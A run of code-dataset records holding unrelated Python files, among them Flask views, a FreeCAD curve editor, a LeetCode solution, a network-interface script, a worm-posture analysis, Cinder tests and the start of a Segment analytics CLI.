If there is a\n # pair, we may still need to multiply the mapping by its weight.\n assert len(L) <= 1\n if len(L) == 0:\n return family.IF.Bucket()\n [(result, weight)] = L\n if weight != 1:\n dummy, result = family.IF.weightedUnion(\n family.IF.Bucket(), result, 0, weight)\n return result\n","repo_name":"Pylons/hypatia","sub_path":"hypatia/text/setops.py","file_name":"setops.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"98"} +{"seq_id":"39995713508","text":"import flask\nfrom cached_property import cached_property\nfrom flask import views\nimport werkzeug.exceptions\n\nfrom dila import application\nfrom dila.frontend.flask import forms\nfrom dila.frontend.flask import languages\nfrom dila.frontend.flask import template_tools\nfrom dila.frontend.flask import user_tools\n\nblueprint = flask.Blueprint('main', __name__)\ntemplate_tools.setup_language_context(blueprint)\ntemplate_tools.setup_user_context(blueprint)\nblueprint.before_request(user_tools.check_login)\n\n\nclass HomeView(views.MethodView):\n def dispatch_request(self, *args, language_code=None):\n self.language_code = language_code\n return super().dispatch_request(*args)\n\n def get(self):\n return flask.render_template('home.html', **self.context)\n\n def post(self):\n if self.form.validate():\n application.add_resource(self.form.new_resource_name.data)\n flask.flash('Resource created')\n return flask.redirect(flask.url_for('main.home'))\n else:\n return self.get()\n\n @property\n def context(self):\n return {\n 'resources': self.resources,\n 'form': self.form,\n }\n\n @cached_property\n def resources(self):\n return application.get_resources()\n\n @cached_property\n def form(self):\n return forms.NewResourceForm()\n\nhome = HomeView.as_view('home')\n\nblueprint.add_url_rule('/', view_func=home)\nblueprint.add_url_rule('/lang//', view_func=home)\n\n\nclass AddLanguageView(views.MethodView):\n\n def post(self):\n if self.form.validate():\n new_language_code = self.form.data['new_language_short']\n application.add_language(\n self.form.data['new_language_name'], new_language_code)\n flask.flash('Language added.')\n return flask.redirect(self.try_replace_language_code(self.form.data['next'], new_language_code))\n else:\n flask.flash('Failed to add language.')\n return flask.redirect(self.form.data['next'])\n\n @cached_property\n def form(self):\n return languages.get_new_form()\n\n def try_replace_language_code(self, next, new_language_code):\n url_adapter = flask._request_ctx_stack.top.url_adapter\n try:\n endpoint, args = url_adapter.match(next, 'GET')\n except werkzeug.exceptions.NotFound:\n return next\n else:\n args['language_code'] = new_language_code\n return flask.url_for(endpoint, **args)\n\n\nblueprint.add_url_rule('/add-language/', view_func=AddLanguageView.as_view('add_language'))\n\n\nclass ResourceView(views.MethodView):\n def dispatch_request(self, *args, language_code=None, resource_pk):\n self.resource_pk = resource_pk\n self.language_code = language_code\n return super().dispatch_request(*args)\n\n def get(self):\n if self.language_code:\n return flask.render_template('resource.html', **self.context)\n else:\n return flask.render_template('resource-no-language.html')\n\n def post(self):\n if self.language_code and self.form.validate():\n po_content = flask.request.files[self.form.po_file.name].read().decode()\n if self.form.data['apply_translations']:\n application.upload_po_file(self.resource_pk, po_content, 
translated_language_code=self.language_code)\n else:\n application.upload_po_file(self.resource_pk, po_content)\n flask.flash('File uploaded')\n return flask.redirect(\n flask.url_for('main.resource', language_code=self.language_code, resource_pk=self.resource_pk))\n else:\n return self.get()\n\n @property\n def context(self):\n return {\n 'translated_strings': self.translated_strings,\n 'form': self.form,\n 'resource_pk': self.resource_pk,\n }\n\n @cached_property\n def form(self):\n return forms.PoFileUpload()\n\n @cached_property\n def translated_strings(self):\n return application.get_translated_strings(self.language_code, self.resource_pk)\n\n\nresource = ResourceView.as_view('resource')\nblueprint.add_url_rule('/res//', view_func=resource)\nblueprint.add_url_rule('/lang//res//', view_func=resource)\n\n\nclass TranslatedStringEditor(views.MethodView):\n def dispatch_request(self, *args, language_code, pk):\n self.language_code = language_code\n self.pk = pk\n return super().dispatch_request(*args)\n\n def get(self):\n return flask.render_template('translated_string.html', **self.context)\n\n def post(self):\n if self.form.validate():\n self.form.set_translated_string(self.language_code, self.pk)\n flask.flash('Translation changed')\n return flask.redirect(\n flask.url_for('main.resource',\n language_code=self.language_code,\n resource_pk=self.translated_string.resource_pk)\n )\n else:\n return self.get()\n\n @property\n def context(self):\n return {\n 'form': self.form,\n 'translated_string': self.translated_string,\n 'resource_pk': self.translated_string.resource_pk,\n }\n\n @cached_property\n def form(self):\n return forms.get_translation_form(self.translated_string)\n\n @cached_property\n def translated_string(self):\n return application.get_translated_string(self.language_code, self.pk)\n\n\nblueprint.add_url_rule('/lang//edit//', view_func=TranslatedStringEditor.as_view('translated_string'))\n\n\nclass PoFileDownload(views.MethodView):\n def get(self, *args, language_code, resource_pk):\n response = flask.make_response(application.get_po_file(language_code, resource_pk))\n response.headers[\"Content-Disposition\"] = \"attachment; filename=translations.po\"\n return response\n\n\nblueprint.add_url_rule('/lang//res//po-file/', view_func=PoFileDownload.as_view('po_file_download'))\n","repo_name":"socialwifi/dila","sub_path":"dila/frontend/flask/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"98"} +{"seq_id":"31173726652","text":"import FreeCAD\nimport FreeCADGui\nimport Part\n\n#import _utils\n\n#import sys\n#from PySide2.QtWidgets import QApplication\n#from PySide2.QtGui import QColor\nfrom pivy import coin\nfrom pivy import graphics\n\nimport sys\nif sys.version_info.major >= 3:\n from importlib import reload\n\ndef midpoint(e):\n p = e.FirstParameter + 0.5 * (e.LastParameter - e.FirstParameter)\n return(e.valueAt(p))\n\ndef subshape_from_sublink(o):\n name = o[1][0]\n if 'Vertex' in name:\n n = eval(name.lstrip('Vertex'))\n return(o[0].Shape.Vertexes[n-1])\n elif 'Edge' in name:\n n = eval(name.lstrip('Edge'))\n return(o[0].Shape.Edges[n-1])\n elif 'Face' in name:\n n = eval(name.lstrip('Face'))\n return(o[0].Shape.Faces[n-1])\n\n#class ConnectionMarker(graphics.Marker):\n #def __init__(self, points):\n #super(ConnectionMarker, self).__init__(points, True)\n\n#class ConnectionPolygon(graphics.Polygon):\n #std_col = \"green\"\n #def __init__(self, markers):\n 
#super(ConnectionPolygon, self).__init__(\n #sum([m.points for m in markers], []), True)\n #self.markers = markers\n\n #for m in self.markers:\n #m.on_drag.append(self.updatePolygon)\n\n #def updatePolygon(self):\n #self.points = sum([m.points for m in self.markers], [])\n\n #@property\n #def drag_objects(self):\n #return self.markers\n\n #def check_dependency(self):\n #if any([m._delete for m in self.markers]):\n #self.delete()\n\nclass MarkerOnShape(graphics.Marker):\n def __init__(self, points, sh=None):\n super(MarkerOnShape, self).__init__(points, True)\n self.shape = None\n self.sublink = None\n if isinstance(sh,Part.Shape):\n self.shape = sh\n elif isinstance(sh,(tuple,list)):\n self.set_sublink(sh)\n\n def set_sublink(self,sl):\n if isinstance(sl,(tuple,list)):\n self.shape = subshape_from_sublink(sl)\n self.sublink = sl\n elif sl is None:\n self.shape = None\n self.sublink = None\n\n def __repr__(self):\n return(\"MarkerOnShape(%s)\"%self.shape)\n\n def drag(self, mouse_coords, fact=1.):\n if self.enabled:\n pts = self.points\n for i, p in enumerate(pts):\n p[0] = mouse_coords[0] * fact + self._tmp_points[i][0]\n p[1] = mouse_coords[1] * fact + self._tmp_points[i][1]\n p[2] = mouse_coords[2] * fact + self._tmp_points[i][2]\n if self.shape:\n v = Part.Vertex(p[0],p[1],p[2])\n proj = v.distToShape(self.shape)[1][0][1]\n # FreeCAD.Console.PrintMessage(\"%s -> %s\\n\"%(p.getValue(),proj))\n p[0] = proj.x\n p[1] = proj.y\n p[2] = proj.z\n self.points = pts\n for foo in self.on_drag:\n foo()\n\nclass ConnectionLine(graphics.Line):\n def __init__(self, markers, dynamic=True):\n super(ConnectionLine, self).__init__(\n sum([m.points for m in markers], []), dynamic)\n self.markers = markers\n for m in self.markers:\n m.on_drag.append(self.updateLine)\n\n def updateLine(self):\n self.points = sum([m.points for m in self.markers], [])\n\n @property\n def drag_objects(self):\n return self.markers\n\n def check_dependency(self):\n if any([m._delete for m in self.markers]):\n self.delete()\n\nclass LineManip(ConnectionLine):\n def __init__(self, face, edge, par=0.0, scale=1.0):\n super(LineManip, self).__init__([], True)\n self.face = face\n self.edge = edge\n self.tangent = None\n self.p1 = MarkerOnShape([(0,0,0)],edge)\n self.p2 = MarkerOnShape([(1,0,0)])\n self._par = 0\n self._scale = 1\n self.param = par\n self.scale = scale\n\n @property\n def param(self):\n return self._par\n\n @param.setter\n def param(self, par):\n if (par >= self.edge.FirstParameter) and (par <= self.edge.LastParameter):\n self._par = par\n self.p1 = MarkerOnShape([self.edge.valueAt(self._par)],edge)\n tangent = self.edge.tangentAt(self._par) # TODO change tangent to cross-tangent\n tangent.normalize()\n tangent.multiply(1e12)\n l = Part.LineSegment(self.edge.valueAt(self._par).sub(tangent),self.edge.valueAt(self._par).add(tangent))\n self.tangent = l.toShape()\n self.p2 = MarkerOnShape([self.tangent.valueAt(self._scale)],self.tangent)\n else:\n FreeCAD.Console.PrintError(\"Bad parameter value, setting to middle of edge\")\n self._par = self.edge.FirstParameter + 0.5 * (self.edge.LastParameter - self.edge.FirstParameter)\n\n @property\n def scale(self):\n return self._scale\n\n @scale.setter\n def scale(self, sc):\n if abs(sc) >= 1e-7:\n self._scale = sc\n self.p2 = MarkerOnShape([self.tangent.valueAt(self._scale)],self.tangent)\n else:\n FreeCAD.Console.PrintError(\"Scale value too small\")\n self._scale = 1e-7\n\n\nclass BlendSurfEditor(object):\n \"\"\"BlendSurfEditor free-hand editor\n my_editor = 
InterpoCurveEditor([points],obj)\n obj is the FreeCAD object that will receive\n the curve shape at the end of editing.\n points can be :\n - Vector (free point)\n - (Vector, shape) (point on shape)\"\"\"\n def __init__(self, seg=[]):\n self.segments = list()\n #self.curve = Part.BSplineCurve()\n self.root_inserted = False\n #self.support = None # Not yet implemented\n for p in seg:\n if isinstance(p,FreeCAD.Vector):\n self.points.append(MarkerOnShape([p]))\n elif isinstance(p,(tuple,list)):\n self.points.append(MarkerOnShape([p[0]],p[1]))\n elif isinstance(p,(MarkerOnShape, ConnectionMarker)):\n self.points.append(p)\n else:\n FreeCAD.Console.PrintError(\"InterpoCurveEditor : bad input\")\n # Setup coin objects\n if self.fp:\n self.guidoc = self.fp.ViewObject.Document\n else:\n if not FreeCADGui.ActiveDocument:\n appdoc = FreeCAD.newDocument(\"New\")\n self.guidoc = FreeCADGui.ActiveDocument\n self.view = self.guidoc.ActiveView\n self.rm = self.view.getViewer().getSoRenderManager()\n self.sg = self.view.getSceneGraph()\n self.setup_InteractionSeparator()\n self.update_curve()\n\n def setup_InteractionSeparator(self):\n if self.root_inserted:\n self.sg.removeChild(self.root)\n self.root = graphics.InteractionSeparator(self.rm)\n self.root.setName(\"InteractionSeparator\")\n self.root.pick_radius = 40\n self.root.on_drag.append(self.update_curve)\n # Keyboard callback\n self._controlCB = self.root.events.addEventCallback(coin.SoKeyboardEvent.getClassTypeId(), self.controlCB)\n # populate root node\n self.root += self.points\n self.build_lines()\n self.root += self.lines\n self.root.register()\n self.sg.addChild(self.root)\n self.root_inserted = True\n\n def compute_tangents(self):\n tans = list()\n flags = list()\n for i in range(len(self.points)):\n if isinstance(self.points[i].shape,Part.Face):\n for vec in self.points[i].points:\n u,v = self.points[i].shape.Surface.parameter(FreeCAD.Vector(vec))\n norm = self.points[i].shape.normalAt(u,v)\n cp = self.curve.parameter(FreeCAD.Vector(vec))\n t = self.curve.tangent(cp)[0]\n pl = Part.Plane(FreeCAD.Vector(),norm)\n ci = Part.Geom2d.Circle2d()\n ci.Radius = t.Length * 2\n w = Part.Wire([ci.toShape(pl)])\n f = Part.Face(w)\n #proj = f.project([Part.Vertex(t)])\n proj = Part.Vertex(t).distToShape(f)[1][0][1]\n #pt = proj.Vertexes[0].Point\n #FreeCAD.Console.PrintMessage(\"Projection %s -> %s\\n\"%(t,proj))\n if proj.Length > 1e-7:\n tans.append(proj)\n flags.append(True)\n else:\n tans.append(FreeCAD.Vector(1,0,0))\n flags.append(False)\n else:\n for j in range(len(self.points[i].points)):\n tans.append(FreeCAD.Vector(1,0,0))\n flags.append(False)\n return(tans,flags)\n\n def update_curve(self):\n pts = list()\n for p in self.points:\n pts += p.points\n #FreeCAD.Console.PrintMessage(\"pts :\\n%s\\n\"%str(pts))\n if len(pts) > 1:\n self.curve.interpolate(pts)\n tans, flags = self.compute_tangents()\n if (len(tans) == len(pts)) and (len(flags) == len(pts)):\n self.curve.interpolate(Points=pts, Tangents=tans, TangentFlags=flags)\n if self.fp:\n self.fp.Shape = self.curve.toShape()\n\n def build_lines(self):\n self.lines = list()\n for i in range(len(self.points)-1):\n line = ConnectionLine([self.points[i], self.points[i+1]]) \n line.set_color(\"blue\")\n self.lines.append(line)\n \n def controlCB(self, attr, event_callback):\n event = event_callback.getEvent()\n if event.getState() == event.UP:\n #FreeCAD.Console.PrintMessage(\"Key pressed : %s\\n\"%event.getKey())\n if event.getKey() == ord(\"i\"):\n self.subdivide()\n elif event.getKey() == 
ord(\"q\"):\n if self.fp:\n self.fp.ViewObject.Proxy.doubleClicked(self.fp.ViewObject)\n else:\n self.quit()\n elif event.getKey() == ord(\"s\"):\n sel = FreeCADGui.Selection.getSelectionEx()\n tup = None\n if len(sel) == 1:\n tup = (sel[0].Object,sel[0].SubElementNames)\n for i in range(len(self.root.selected_objects)):\n if isinstance(self.root.selected_objects[i],MarkerOnShape):\n self.root.selected_objects[i].set_sublink(tup)\n FreeCAD.Console.PrintMessage(\"Snapped to %s\\n\"%str(self.root.selected_objects[i].sublink))\n self.root.selected_objects[i].drag_start()\n self.root.selected_objects[i].drag((0,0,0))\n self.update_curve()\n elif (event.getKey() == 65535) or (event.getKey() == 65288): # Suppr or Backspace\n #FreeCAD.Console.PrintMessage(\"Some objects have been deleted\\n\")\n pts = list()\n for o in self.root.dynamic_objects:\n if isinstance(o,MarkerOnShape):\n pts.append(o)\n self.points = pts\n self.setup_InteractionSeparator()\n self.update_curve()\n \n def subdivide(self):\n # get selected lines and subdivide them\n pts = list()\n new_select = list()\n for o in self.lines:\n #FreeCAD.Console.PrintMessage(\"object %s\\n\"%str(o))\n if isinstance(o,ConnectionLine):\n pts.append(o.markers[0])\n if o in self.root.selected_objects:\n idx = self.lines.index(o)\n FreeCAD.Console.PrintMessage(\"Subdividing line #%d\\n\"%idx)\n p1 = o.markers[0].points[0]\n p2 = o.markers[1].points[0]\n par1 = self.curve.parameter(FreeCAD.Vector(p1))\n par2 = self.curve.parameter(FreeCAD.Vector(p2))\n midpar = (par1+par2)/2.0\n mark = MarkerOnShape([self.curve.value(midpar)])\n pts.append(mark)\n new_select.append(mark)\n pts.append(self.points[-1])\n self.points = pts\n self.setup_InteractionSeparator()\n self.root.selected_objects = new_select\n self.update_curve()\n return(True)\n \n def quit(self):\n self.root.events.removeEventCallback(coin.SoKeyboardEvent.getClassTypeId(), self._controlCB)\n self.root.unregister()\n self.sg.removeChild(self.root)\n self.root_inserted = False\n \n\n\n\ndef get_guide_params():\n sel = FreeCADGui.Selection.getSelectionEx()\n pts = list()\n for s in sel:\n pts.extend(list(zip(s.PickedPoints,s.SubObjects)))\n return(pts)\n\ndef main():\n #obj = FreeCAD.ActiveDocument.addObject(\"Part::Spline\",\"profile\")\n #tups = get_guide_params()\n sel = FreeCADGui.Selection.getSelection()\n ip = BlendSurfEditor(sel)\n FreeCAD.ActiveDocument.recompute()\n\nif __name__ == '__main__':\n main()\n","repo_name":"Planthistories/CurvesWB","sub_path":"freecad/Curves/blendsurf_editor.py","file_name":"blendsurf_editor.py","file_ext":"py","file_size_in_byte":12940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"98"} +{"seq_id":"7510552593","text":"from collections import defaultdict\nclass Solution:\n # 668 ms, 99.52%. Time: O(NlogN). Space: O(N)\n def alertNames(self, keyName: List[str], keyTime: List[str]) -> List[str]:\n \n def is_within_1hr(t1, t2):\n h1, m1 = t1.split(\":\")\n h2, m2 = t2.split(\":\")\n if int(h1) + 1 < int(h2): return False\n if h1 == h2: return True\n return m1 >= m2\n \n records = defaultdict(list)\n for name, time in zip(keyName, keyTime):\n records[name].append(time)\n \n res = []\n for person, record in records.items():\n record.sort()\n\t\t\t# Loop through 2 values at a time and check if they are within 1 hour.\n # eg take index 0, and check index 2, skip one. 
if within count it\n if any(is_within_1hr(t1, t2) for t1, t2 in zip(record, record[2:])):\n res.append(person)\n return sorted(res)","repo_name":"darren170999/InterviewPreparation","sub_path":"zCompanies/zCoinbase/alertusingsamekeycard3timesormoreinahourperiod.py","file_name":"alertusingsamekeycard3timesormoreinahourperiod.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"6288490970","text":"import re\n\n\ndef max_population(data): \n new_result = []\n \n for item in range(1, len(data)):\n new_result.append((re.findall(r\"((?<=\\,)\\w+(? max_num:\n max_num = new_result[item][int(1)]\n\n for item in new_result:\n if str(max_num) in item:\n item[1] = int(max_num)\n return tuple(item)\n\n\ndata = [\"id,name,poppulation,is_capital\",\n\"3024,eu_kyiv,24834,y\",\n\"3025,eu_volynia,20231,n\",\n\"3026,eu_galych,23745,n\",\n\"4892,me_medina,18038,n\",\n\"4401,af_cairo,18946,y\",\n\"4700,me_tabriz,13421,n\",\n\"4899,me_bagdad,22723,y\",\n\"6600,af_zulu,09720,n\"]\nprint(max_population(data))\n","repo_name":"VolodymyrDzhupyna/python-online-marathon","sub_path":"sprint02/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"14742445388","text":"# coding:utf-8\n\nimport netifaces\nimport json\nimport argparse\n\n\ndef get_interfaces(router):\n res = []\n all_interfaces = netifaces.interfaces()\n for inf in all_interfaces:\n if router in inf:\n res.append(inf)\n return res\n\n\ndef get_adapter_info(interfaces):\n res = []\n for inface in interfaces:\n iface_info = {}\n iface_info['name'] = inface\n iface_info['addresses'] = {}\n\n ipv6_addr = netifaces.ifaddresses(inface)[netifaces.AF_INET6][0]['addr'].split('%')[0]\n iface_info['addresses']['ipv6'] = ipv6_addr\n\n ipv6_mask = netifaces.ifaddresses(inface)[netifaces.AF_INET6][0]['netmask']\n iface_info['addresses']['mask'] = ipv6_mask\n\n mac_addr = netifaces.ifaddresses(inface)[netifaces.AF_PACKET][0]['addr']\n iface_info['addresses']['mac'] = mac_addr\n\n res.append(iface_info)\n return res\n\n\n# python xxx.py --node r1\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--node\", type=str, required=True, help=\"device name\")\n\n # obtain the router name\n router_name = parser.parse_args().node\n\n # obtain the data interfaces\n interfaces = get_interfaces(router_name)\n\n # obtain the interfaces' address information\n iface_info = get_adapter_info(interfaces)\n\n info_json = json.dumps(iface_info)\n\n print(info_json)\n","repo_name":"OucMan/TrafficEngineering","sub_path":"netadapter/test-net-adapter.py","file_name":"test-net-adapter.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"15046899630","text":"class Node:\n def __init__(self, value):\n self.data = value\n self.left = None\n self.right = None\n\n\ndef dfs(root):\n if root:\n dfs(root.left)\n print(root.data)\n dfs(root.right)\n\n\nroot = Node(1)\nroot.left = Node(2)\nroot.right = Node(3)\ndfs(root)\n","repo_name":"alamb0/Data-Structures-Algorithms","sub_path":"Algorithms/Tree/DFS/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"27255109580","text":"#libraries imported\nfrom code_gen import 
EigenData\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndata = EigenData() #creates instance of class\neigenworms = data.get_eigenworms('EigenWorms.mat') #calls function get_eigenworms() and returns array eigenworms\nfootage = data.get_footage('20150814-All-PNAS2011-DataStitched .mat') #calls function get_footage() and returns dictionary of eigenvalues for the 12 worms\n#class Initial_graphs\nclass Initial_graphs(object):\n #function displays a visualisatoon of the variance\n def variance_modes_function(self):\n count =0 #get first worm\n for wormfootage in footage: #every worm in footage dictionary\n if count == 0: #first worm\n worm = footage[ wormfootage ]\n worm = worm.transpose() #transposes\n firstrow = worm[0] #first frame\n count += 1\n # sort the eigenvalues in descending order\n total_sum_firstworm = np.sum(firstrow) #finds sum of first row\n total_sum_squares = np.sum(np.square(firstrow)) \n eigen_square= np.square(firstrow) #square of each number array\n # compute the total sum of all eigenvalues\n total_var = np.sum(firstrow)\n count2=0 #counts the first 4 four modes\n array_var = [] #creates an array\n sumv=0 #sum of variance captured by 4 components\n for value in eigen_square: #loops in values \n percentage_of_variance = (value / total_sum_squares) #finds percentage of variance for that value\n array_var.append(percentage_of_variance)\n if count2<4: \n sumv = sumv + percentage_of_variance #sum of first 4 modes\n count2+=1 \n array_var = [0.2967,0.5678,0.8313,0.948,0.9887]\n # plot the fraction of variance explained\n x = [1,2,3,4,5]\n plt.plot(x, array_var,'.',markersize=14) #plots the 5 dots\n plt.xticks(range(1, 6)) #values in x axis\n plt.axhline(y=1, color='r', linestyle='-') #line at y=1\n plt.xlabel('K',fontsize=13) #x label\n plt.ylabel(r'$\\sigma^2_K$',fontsize=16) #y label\n plt.show() # display graph\n\n #finds variance percentage at a specific timeframe and displays them as percentages in 2dp\n def variance_percentages(self,k):\n count =0 #get first worm\n for wormfootage in footage:\n if count == 0:\n worm = footage[wormfootage]\n worm = worm.transpose()\n firstrow = worm[k] # timestamp k\n count += 1\n \n print(firstrow) #prints values\n total_sum_firstworm = np.sum(firstrow) #finds sum of first row\n print(\"Total sum:\" ,total_sum_firstworm)\n total_sum_squares = np.sum(np.square(firstrow)) #sum of squares\n print(\"Total sum of squares:\",total_sum_squares)\n eigen_square= np.square(firstrow) #square of each number array\n print(\"Eigenvalues squared:\",eigen_square)\n count2=0 #counts the first 4 four modes\n sumv=0 #sum of variance captured by 4 components\n for value in eigen_square: #loops in values \n percentage_of_variance = (value / total_sum_squares) * 100 #finds percentage of variance for that value\n print(\"Variance percentage in 2dp: {:.2f}%\".format(percentage_of_variance)) #prints\n if count2<4: \n sumv = sumv + percentage_of_variance #sum of first 4 modes\n count2+=1 \n print(sumv)\n #function adds percentages in arrays to find the mean\n def total_variance_percentages(self,s1,s2):\n count =0 #get first worm\n for wormfootage in footage:\n if count == 0:\n worm = footage[wormfootage]\n worm = worm.transpose()\n count += 1\n #arrays that each percentage of component are stored\n k1 = []\n k2 = []\n k3 = []\n k4 = []\n k5 = []\n sum4 = []\n worm = worm[s1:s2] #each 100 values\n for row in worm:\n total_sum_firstworm = np.sum(row)\n #print(\"Total sum:\" ,total_sum_firstworm)\n total_sum_squares = np.sum(np.square(row))\n #print(\"Total 
sum of squares:\",total_sum_squares)\n eigen_square= np.square(row)\n #print(\"Eigenvalues squared:\",eigen_square)\n count1=0\n count2=0\n\n sumv=0\n #appends in component in the corresponding array\n for value in eigen_square:\n percentage_of_variance = (value / total_sum_squares) * 100\n if count1 == 0:\n k1.append(percentage_of_variance)\n elif count1 == 1:\n k2.append(percentage_of_variance)\n elif count1 == 2:\n k3.append(percentage_of_variance)\n elif count1 == 3:\n k4.append(percentage_of_variance)\n elif count1 == 4:\n k5.append(percentage_of_variance)\n sum4.append(sumv)\n if count2<4:\n sumv = sumv + percentage_of_variance\n count2+=1\n count1+=1\n #finds mean of each 100 numbers\n k1_sum = sum(k1)/100\n #print(\"Average value of k1:\",k1_sum/1000)\n k2_sum = np.sum(k2)/100\n #print(\"Average value of k2:\",k2_sum/1000)\n k3_sum = np.sum(k3)/100\n #print(\"Average value of k3:\",k3_sum/1000)\n k4_sum = np.sum(k4)/100\n #print(\"Average value of k4:\",k4_sum/1000)\n k5_sum = np.sum(k5)/100\n #print(\"Average value of k5:\",k5_sum/1000)\n Ssum4 = np.sum(sum4)/100\n #print(\"Average value of sum4:\",Ssum4/33600)\n return k1_sum,k2_sum,k3_sum,k4_sum,k5_sum,Ssum4\n\n#k indicates the row in eigenvalues -> timestamp dt\nk=0\nInitial_graphs().variance_modes_function()\n#Initial_graphs().variance_percentages(k)\ni=0\ns1=0\ns2=100\narray1 = []\narray2 = []\narray3 = []\narray4 = []\narray5 = []\narray_sum4 = []\nfor i in range(0,336):\n v1,v2,v3,v4,v5,avg4 = Initial_graphs().total_variance_percentages(s1,s2) #finds the mean for each 100 values\n s1+=100\n s2+=100\n #adds mean values to arrays\n array1.append(v1)\n array2.append(v2)\n array3.append(v3)\n array4.append(v4)\n array5.append(v5)\n array_sum4.append(avg4)\n","repo_name":"sc20af/COHEN2-final_year_project","sub_path":"variance_graphs.py","file_name":"variance_graphs.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"24356077718","text":"import mock\n\nfrom cinder import exception\nfrom cinder import test\nfrom cinder.volume.drivers.windows import windows_utils\n\n\nclass WindowsUtilsTestCase(test.TestCase):\n\n def setUp(self):\n super(WindowsUtilsTestCase, self).setUp()\n\n windows_utils.WindowsUtils.__init__ = lambda x: None\n self.wutils = windows_utils.WindowsUtils()\n self.wutils._conn_wmi = mock.Mock()\n self.wutils._conn_cimv2 = mock.MagicMock()\n\n def _test_copy_vhd_disk(self, source_exists=True, copy_failed=False):\n fake_data_file_object = mock.MagicMock()\n fake_data_file_object.Copy.return_value = [int(copy_failed)]\n\n fake_vhd_list = [fake_data_file_object] if source_exists else []\n mock_query = mock.Mock(return_value=fake_vhd_list)\n self.wutils._conn_cimv2.query = mock_query\n\n if not source_exists or copy_failed:\n self.assertRaises(exception.VolumeBackendAPIException,\n self.wutils.copy_vhd_disk,\n mock.sentinel.src,\n mock.sentinel.dest)\n else:\n self.wutils.copy_vhd_disk(mock.sentinel.src, mock.sentinel.dest)\n\n expected_query = (\n \"Select * from CIM_DataFile where Name = '%s'\" %\n mock.sentinel.src)\n mock_query.assert_called_once_with(expected_query)\n fake_data_file_object.Copy.assert_called_with(\n mock.sentinel.dest)\n\n def test_copy_vhd_disk(self):\n self._test_copy_vhd_disk()\n\n def test_copy_vhd_disk_invalid_source(self):\n self._test_copy_vhd_disk(source_exists=False)\n\n def test_copy_vhd_disk_copy_failed(self):\n self._test_copy_vhd_disk(copy_failed=True)\n\n 
@mock.patch.object(windows_utils, 'wmi', create=True)\n def test_import_wt_disk_exception(self, mock_wmi):\n mock_wmi.x_wmi = Exception\n mock_import_disk = self.wutils._conn_wmi.WT_Disk.ImportWTDisk\n mock_import_disk.side_effect = mock_wmi.x_wmi\n\n self.assertRaises(exception.VolumeBackendAPIException,\n self.wutils.import_wt_disk,\n mock.sentinel.vhd_path,\n mock.sentinel.vol_name)\n mock_import_disk.assert_called_once_with(\n DevicePath=mock.sentinel.vhd_path,\n Description=mock.sentinel.vol_name)\n\n def test_check_if_resize_is_needed_bigger_requested_size(self):\n ret_val = self.wutils.is_resize_needed(\n mock.sentinel.vhd_path, 1, 0)\n self.assertTrue(ret_val)\n\n def test_check_if_resize_is_needed_equal_requested_size(self):\n ret_val = self.wutils.is_resize_needed(\n mock.sentinel.vhd_path, 1, 1)\n self.assertFalse(ret_val)\n\n def test_check_if_resize_is_needed_smaller_requested_size(self):\n self.assertRaises(\n exception.VolumeBackendAPIException,\n self.wutils.is_resize_needed,\n mock.sentinel.vhd_path, 1, 2)\n","repo_name":"TonyChengTW/OpenStack_Liberty_Control","sub_path":"cinder/tests/windows/test_windows_utils.py","file_name":"test_windows_utils.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"98"} {"seq_id":"42634471652","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/5/30 15:30\n# @Author : PFinal南丞\n\"\"\"analytics.\n\nUsage:\n analytics --writeKey=<writeKey> --type=track --event=<event> [--properties=<properties>] [--context=<context>] [--userId=<userId>] [--anonymousId=<anonymousId>] [--integrations=<integrations>] [--timestamp=<timestamp>]\n analytics --writeKey=<writeKey> --type=screen --name=<name> [--properties=<properties>] [--context=<context>] [--userId=<userId>] [--anonymousId=<anonymousId>] [--integrations=<integrations>] [--timestamp=<timestamp>]\n analytics --writeKey=<writeKey> --type=page --name=<name> [--properties=<properties>] [--userId=<userId>] [--context=<context>] [--integrations=<integrations>] [--timestamp=<timestamp>]\n analytics --writeKey=<writeKey> --type=identify [--traits=<traits>] [--context=<context>] [--userId=<userId>] [--anonymousId=<anonymousId>] [--integrations=<integrations>] [--timestamp=<timestamp>]\n analytics --writeKey=<writeKey> --type=group --groupId=<groupId> [--traits=<traits>] [--properties=<properties>] [--context=<context>] [--userId=<userId>] [--anonymousId=<anonymousId>] [--integrations=<integrations>] [--timestamp=<timestamp>]\n analytics --writeKey=<writeKey> --type=alias --userId=<userId> --previousId=<previousId> [--context=<context>] [--anonymousId=<anonymousId>] [--integrations=<integrations>] [--timestamp=<timestamp>]\n analytics -h | --help\n analytics --version\n\nOptions:\n -h --help Show this screen.\n --version Show version.\n\"\"\"\nfrom docopt import docopt\nimport analytics\nimport os\nimport json\nimport sys\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='1.0.0')\n\n writeKey = arguments[\"--writeKey\"]\n if not writeKey:\n analytics.write_key = os.getenv('SEGMENT_WRITE_KEY')\n else:\n analytics.write_key = writeKey\n\n userId = arguments[\"--userId\"]\n anonymousId = arguments[\"--anonymousId\"]\n timestamp = arguments[\"--timestamp\"]\n context = arguments[\"--context\"]\n if context:\n context = json.loads(context)\n integrations = arguments[\"--integrations\"]\n if integrations:\n integrations = json.loads(integrations)\n\n msgType = arguments[\"--type\"]\n\n
